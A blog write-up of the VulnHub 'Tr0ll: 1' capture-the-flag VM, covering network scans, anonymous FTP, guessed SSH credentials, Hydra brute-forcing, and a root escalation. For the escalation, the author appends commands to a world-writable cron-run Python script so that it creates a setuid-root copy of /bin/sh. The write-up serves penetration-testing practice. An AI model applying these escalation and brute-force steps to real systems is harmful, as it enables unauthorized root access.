Tr0ll: 1

Running through CTFs is a great way to sharpen your offensive skills so lately I’ve been spending a decent chunk of my spare time trying to pwn VulnHub VMs. I’m planning on doing a write-up for all the ones I’ve completed so far, this is the first in that series of posts. You can get this VM here

DESCRIPTION

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!

MAPPING THE TARGET

The first step is to find the IP address belonging to the VM, we can do that using an ARP scanner called Netdiscover

1
2
3
4
5
6
7
8
[email protected]:~$ sudo netdiscover
Currently scanning: 192.168.4.0/16   |   Screen View: Unique Hosts

7 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 420
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.25    00:0c:29:39:e9:62      1      60  VMware, Inc.

Now that we have an IP address we can see what ports are open using nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[email protected]:~$ sudo nmap -A -T4 -p- 192.168.1.25
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-18 01:43 EST
Nmap scan report for 192.168.1.25
Host is up (0.00048s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

EXPLOITING

Ok, so we have anonymous FTP, SSH and Apache to play with. Let’s start from the top and see what FTP has to offer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[email protected]:~$ ftp 192.168.1.25
Connected to 192.168.1.25.
220 (vsFTPd 3.0.2)
Name (192.168.1.25:mog): anonymous  
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 09  2014 .
drwxr-xr-x    2 0        112          4096 Aug 09  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (2.7479 MB/s)
ftp> bye
221 Goodbye.

So I’ve just downloaded a packet capture file, but before opening it in Wireshark I decided to see if we could find anything interesting using strings

1
2
3
4
5
[email protected]:~$ strings lol.pcap
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!

Hmm.. we’ll file that away for later. Time to check what Apache has, loading up Firefox we’re greeted with this image

apache-default

The trolling begins! The robots.txt for this site mentions a /secret directory, so let’s check that out

1
2
User-agent:*
Disallow: /secret

apache-secret

Nothing useful here. I ran dirb to check for any other directories but it came back empty

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
[email protected]:~$ dirb http://192.168.1.25 /usr/share/dirb/wordlists/big.txt 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan 18 02:30:51 2017
URL_BASE: http://192.168.1.25/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.1.25/ ----
+ http://192.168.1.25/robots.txt (CODE:200|SIZE:31)                                                                                    
==> DIRECTORY: http://192.168.1.25/secret/                                                                                             
+ http://192.168.1.25/server-status (CODE:403|SIZE:292)                                                                                
---- Entering directory: http://192.168.1.25/secret/ ----
        
-----------------
END_TIME: Wed Jan 18 02:31:04 2017
DOWNLOADED: 40916 - FOUND: 2

Nikto didn’t turn up anything interesting either

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[email protected]:~$ nikto -h http://192.168.1.25
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.25
+ Target Hostname:    192.168.1.25
+ Target Port:        80
+ Start Time:         2017-01-18 02:34:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-01-18 02:35:03 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

After a bit of thinking I realized that the sup3rs3cr3tdirlol mentioned in lol.pcap was likely a directory, lo and behold

sup3rs3cr3tdirlol

After downloading and executing the binary it outputs the following message

1
Find address 0x0856BF to proceed

I had a hunch this was going to be another directory instead of an actual memory address

0x0856BF

Those directories contain the following

1
2
3
4
5
6
7
8
9
10
11
12
/0x0856BF/good_luck/which_one_lol.txt

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
1
2
Index of /0x0856BF/this_folder_contains_the_password/Pass.txt 
Good_job_:)

Using the list from which_one_lol.txt as potential usernames and Good_job_:) as the password I ran this using Hydra against SSH. Unfortunately after 8 wrong attempts the service closes for a few minutes (most likely thanks to fail2ban) and the session isn’t saved in Hydra, which makes bruteforcing a bit hard. After trying to get Hydra to automatically resume after it times out for a while I figured doing this manually was probably much faster. It turns out that password isn’t valid for any of the accounts listed. But of course, this being one big exercise in trolling meant that I wasn’t taking it literally enough. The directory this_folder_contains_the_password was referencing the fact that the password actually was ‘Pass.txt’. After an hour or two I finally got on with the login overflow:Pass.txt

1
2
$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)

After a few minutes of searching for files to help me gain root, I was booted off with the following message

1
2
3
4
5
6
Broadcast Message from [email protected]                                               
        (somewhere) at 0:10 ...                                                
                                                                               
TIMES UP LOL!                                                                  
                                                                               
Connection to 192.168.1.25 closed by remote host.

It seems the trolling isn’t over yet! I jumped back on and checked cronlog to see if there was anything being executed by crontab and discovered that every 2 minutes a script called cleaner.py was being called

1
2
$ cat /var/log/cronlog
*/2 * * * * cleaner.py

Using find I discovered it was sitting in /lib/log/ and was world-writeable. This is the contents of the script

1
2
3
4
5
6
7
8
$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
	os.system('rm -r /tmp/* ')
except:
	sys.exit()

I appended the following and made a coffee

1
2
os.system('cp /bin/sh /tmp/shell')
os.system('chmod 4777 /tmp/shell')

When I came back I had a shell owned by root I could use

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ ls -lah /tmp
total 120K
drwxrwxrwt  2 root root 4.0K Jan 18 00:30 .
drwxr-xr-x 21 root root 4.0K Aug  9  2014 ..
-rwsrwxrwx  1 root root 110K Jan 18 00:30 shell
$ ./tmp/shell
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# cd /root
# ls -lah
total 28K
drwx------  3 root root 4.0K Aug 13  2014 .
drwxr-xr-x 21 root root 4.0K Aug  9  2014 ..
-rw-------  1 root root    0 Aug 13  2014 .bash_history
-rw-r--r--  1 root root   58 Aug 10  2014 proof.txt
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4.0K Aug 10  2014 .ssh
-rw-------  1 root root 5.5K Aug 13  2014 .viminfo

SUCCESS!

1
2
3
4
# cat proof.txt
Good job, you did it! 

702a8c18d29c6f3ca0d99ef5712bfbdc